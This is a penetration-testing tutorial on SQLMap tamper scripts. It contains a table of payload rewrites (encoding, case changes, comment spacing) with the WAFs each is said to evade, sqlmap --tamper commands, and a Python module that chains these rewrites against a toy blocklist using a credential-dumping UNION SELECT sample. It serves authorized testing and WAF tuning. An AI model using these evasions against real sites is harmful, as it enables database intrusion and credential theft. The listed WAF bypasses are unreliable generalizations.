Author: Trix Cyrus
SQLMap is one of the most powerful tools for automated SQL injection testing, but when faced with a robust Web Application Firewall (WAF), its default payloads will often be blocked before they reach the database. That's where tamper scripts come into play. A tamper script is a small Python module that SQLMap loads at startup; it exposes a tamper(payload, **kwargs) function that rewrites the payload string just before it is sent, so the keywords, spaces and quotes the WAF's signatures look for no longer appear in their literal form.
This guide dives deep into SQLMap's tamper scripts, explaining their functionality, how they modify payloads, and which WAFs they can bypass. Whether you're a penetration tester or a cybersecurity enthusiast, mastering these scripts is essential for maximizing SQLMap's potential.
The Complete Tamper Script Table
Here’s a curated table that organizes tamper scripts, their functionality, modifications to payloads, and the WAFs they target:
Tamper Script | Functionality | Payload Modification | WAFs It Can Bypass |
---|---|---|---|
apostrophemask.py | Replaces the single quote with its UTF-8 full-width counterpart. | Converts `'` to `%EF%BC%87`. | ModSecurity, AWS WAF |
base64encode.py | Base64-encodes the whole payload. | `UNION SELECT` becomes `VU5JT04gU0VMRUNU`. | Cloudflare, Barracuda WAF |
between.py | Replaces `=` with a `BETWEEN` clause and `>` with `NOT BETWEEN 0 AND`. | `WHERE id=1` becomes `WHERE id BETWEEN 1 AND 1`; `A > B` becomes `A NOT BETWEEN 0 AND B`. | Barracuda, FortiWAF |
charunicodeencode.py | Unicode-URL-encodes every character (the `%uXXXX` form decoded by ASP/ASP.NET). | `SELECT` becomes `%u0053%u0045%u004C%u0045%u0043%u0054`. | ModSecurity, Imperva, Cloudflare |
chardoubleencode.py | Double-URL-encodes every character, so one decoding pass still leaves it encoded. | `'` becomes `%2527`. | ModSecurity, AWS WAF, Imperva |
commalesslimit.py, commalessmid.py | Rewrite comma-separated MySQL syntax so the payload carries no commas. | `LIMIT 2, 3` becomes `LIMIT 3 OFFSET 2`; `MID(A, B, C)` becomes `MID(A FROM B FOR C)`. | Cloudflare, ASP.NET WAF |
equaltolike.py | Replaces `=` with `LIKE`. | `WHERE id=1` becomes `WHERE id LIKE 1`. | Akamai, FortiWAF |
greatest.py | Replaces the `>` operator with a `GREATEST()` comparison. | `A > B` becomes `GREATEST(A,B+1)=A`. | F5 BIG-IP ASM, Imperva |
lowercase.py | Lowercases every keyword character. | `SELECT` becomes `select`. | ModSecurity, Cloudflare |
overlongutf8.py | Encodes non-alphanumeric characters as overlong two-byte UTF-8 sequences. | `'` becomes `%C0%A7`. | ModSecurity, Imperva, ASP.NET WAF |
randomcase.py | Randomizes the case of keyword characters. | `SELECT` becomes, for example, `sElEcT`. | Cloudflare, Barracuda WAF |
space2comment.py | Replaces spaces with inline comments (`/**/`). | `SELECT 1 FROM table` becomes `SELECT/**/1/**/FROM/**/table`. | Cloudflare, Akamai |
space2hash.py | Replaces each space (MySQL) with a `#` comment, a random string and a newline. | `1 AND 9227=9227` becomes `1%23<random>%0AAND%23<random>%0A9227=9227`. | ModSecurity, Cloudflare |
space2dash.py | Replaces each space with a `--` comment, a random string and a newline (dialects where `--` starts a comment). | `1 AND 9227=9227` becomes `1--<random>%0AAND--<random>%0A9227=9227`. | FortiWAF, Cloudflare |
multiplespaces.py | Adds several spaces around SQL keywords. | `1 UNION SELECT foobar` becomes `1    UNION     SELECT   foobar`. | F5, Barracuda |
nonrecursivereplacement.py | Splices each keyword into itself so that a single, non-recursive `.replace('SELECT', '')` filter reassembles the original. | `UNION SELECT` becomes `UNIOUNIONN SELESELECTCT`. | Imperva, F5 |
space2randomblank.py | Replaces each space with a random valid blank character (`%09`, `%0A`, `%0C` or `%0D`). | `SELECT * FROM users` becomes, for example, `SELECT%09*%0DFROM%0Ausers`. | Cloudflare, Imperva |
charencode.py | URL-encodes every character (sequences that are already encoded are left alone). | `SELECT * FROM users` becomes `%53%45%4C%45%43%54%20%2A%20%46%52%4F%4D%20%75%73%65%72%73`. | Akamai, Barracuda |
versionedkeywords.py | Wraps each non-function keyword in a MySQL versioned comment. | `UNION ALL SELECT` becomes `/*!UNION*//*!ALL*//*!SELECT*/`. | ModSecurity, Cloudflare, Imperva |

The numbered form of the versioned comment (`/*!50000SELECT*/`) is produced by modsecurityversioned.py and modsecurityzeroversioned.py, which wrap the whole query rather than individual keywords. Treat the last column as a list of starting points rather than a guarantee: whether a script gets past a given product depends on the ruleset version, its normalization steps (URL decoding, comment stripping, case folding) and how the deployment has been tuned, so always verify against the target.
How to Use Tamper Scripts with SQLMap
SQLMap makes it easy to use tamper scripts during testing. Pass the --tamper flag followed by the name of the script (with or without the .py suffix; a path to a script of your own also works):
sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=space2comment
You can chain multiple scripts by separating them with commas. They are applied one after another (SQLMap also orders them by each script's __priority__), so the combination matters: an encoding script that runs first leaves no spaces or keywords for a later script to rewrite.
sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=randomcase,space2dash
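The table describes what each script does to a payload; the following stand-alone Python module is an added example (not SQLMap's own code and not a copy of any shipped script) that models a few of those transformations in the shape SQLMap expects from a tamper script, composes them the way --tamper=a,b chaining does, and runs the results through a constructed regex blocklist so you can see which rewrites survive a filter that decodes its input before matching. The PRIORITY fallback, the extra rng parameter on randomcase and the toy WAF rules are assumptions made so the file runs outside the sqlmap tree.

```python
"""Added example, not sqlmap's own code: a stand-alone model of how tamper
scripts rewrite payloads, how --tamper chaining composes them, and why the
encoding scripts do nothing against a filter that decodes before matching.

Each function keeps the interface sqlmap expects from a tamper script
(``tamper(payload, **kwargs)`` returning a string, plus ``__priority__`` and
``dependencies()``); the bodies are simplified re-creations of what the
table describes, not copies of the shipped scripts. ``toy_waf_blocks`` is
a constructed regex blocklist standing in for a real product.
"""
import random
import re
from urllib.parse import unquote

try:
    from lib.core.enums import PRIORITY  # available when loaded by sqlmap itself
except ImportError:  # stand-alone run; fallback mirrors the enum's shape (assumption)
    class PRIORITY:
        LOWEST, LOWER, LOW, NORMAL, HIGH, HIGHER, HIGHEST = range(7)

__priority__ = PRIORITY.LOW


def dependencies():
    """sqlmap calls this once when loading the script; DBMS-specific scripts warn here."""


def space2comment(payload, **kwargs):
    """space2comment.py: each blank becomes /**/ (simplified: sqlmap skips blanks
    inside quoted strings)."""
    return payload.replace(" ", "/**/") if payload else payload


def between(payload, **kwargs):
    """between.py: ``A = B`` becomes ``A BETWEEN B AND B``."""
    return re.sub(r"\s*=\s*('[^']*'|\w+)", r" BETWEEN \1 AND \1", payload) if payload else payload


def charencode(payload, **kwargs):
    """charencode.py: percent-encode every character (simplified: sqlmap leaves
    already-encoded sequences alone)."""
    return "".join("%%%02X" % ord(c) for c in payload) if payload else payload


def chardoubleencode(payload, **kwargs):
    """chardoubleencode.py: %XX becomes %25XX, so one decode still leaves %XX."""
    return "".join("%%25%02X" % ord(c) for c in payload) if payload else payload


def randomcase(payload, rng=None, **kwargs):
    """randomcase.py: flip letter case at random. ``rng`` is an added parameter so
    runs can be reproduced; sqlmap's script has no such argument."""
    rng = rng or random.Random()
    out = []
    for c in payload or "":
        if c.isalpha():
            c = c.upper() if rng.random() < 0.5 else c.lower()
        out.append(c)
    return "".join(out)


def tamper(payload, **kwargs):
    """Entry point sqlmap imports when this file is passed to --tamper."""
    return space2comment(payload, **kwargs)


def chain(payload, *tampers, **kwargs):
    """Apply tampers left to right, the way --tamper=a,b,c composes them
    (sqlmap additionally orders scripts by __priority__ before applying them)."""
    for fn in tampers:
        payload = fn(payload, **kwargs)
    return payload


# Constructed blocklist standing in for a signature-based WAF. It percent-decodes
# the parameter a fixed number of times before matching (modelled assumption).
TOY_RULES = [
    re.compile(r"\bUNION\s+SELECT\b", re.I),
    re.compile(r"\b\w+\s*=\s*\w+\s*(--|#|$)", re.I),  # tautology tail such as 1=1--
]


def toy_waf_blocks(param_value, decode_passes=1):
    """True when the (decoded) parameter value matches any blocklist rule."""
    value = param_value
    for _ in range(decode_passes):
        value = unquote(value)
    return any(rule.search(value) for rule in TOY_RULES)


if __name__ == "__main__":
    p = "1 UNION SELECT user,pass FROM users--"  # constructed sample payload
    for label, candidate in [
        ("raw", p),
        ("space2comment", space2comment(p)),
        ("charencode", charencode(p)),
        ("charencode then space2comment", chain(p, charencode, space2comment)),
        ("space2comment then charencode", chain(p, space2comment, charencode)),
        ("chardoubleencode", chardoubleencode(p)),
    ]:
        print(f"{label:32} blocked={toy_waf_blocks(candidate)}  {candidate}")
    print("between:", between("1 AND 1=1--"))
```

Run the file directly to print which candidates the toy blocklist stops; copied into sqlmap's tamper/ directory (or passed by path to --tamper) its tamper() entry point behaves as a space2comment variant. The two results worth internalizing are that charencode alone is undone by the WAF's single decode, and that chardoubleencode only helps when the WAF decodes once while the application decodes a second time; the same reasoning applies to every encoding script in the table.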
Key Use Cases
- Bypassing specific WAFs: if a WAF blocks common SQL keywords, try randomcase.py or charunicodeencode.py to change how the keywords appear on the wire.
- Evading blacklists: scripts such as apostrophemask.py and space2hash.py work well against blacklist-based filtering that matches literal quotes or spaces.
- Testing WAF configurations: run tamper scripts one at a time against a known-vulnerable parameter to learn which rules the WAF implements and where its normalization is weak.
Pro Tips for Effective Testing
- Understand the Target WAF: Research the WAF type and rules it enforces to choose the right tamper scripts.
- Experiment with Chaining: Combining multiple tamper scripts often yields better results.
- Always Document Findings: Record the scripts and payloads used for effective reporting.
Closing Thoughts
Tamper scripts are a game-changer for SQLMap users, enabling advanced payload obfuscation and WAF evasion. By understanding what each script changes in the payload, penetration testers can get injection attempts past signature-based defenses that would otherwise stop SQLMap cold. However, always remember to use these tools ethically and responsibly, against systems you are authorized to test, to improve security rather than to exploit it.
"Stay curious, stay ethical, and keep testing."
~Trixsec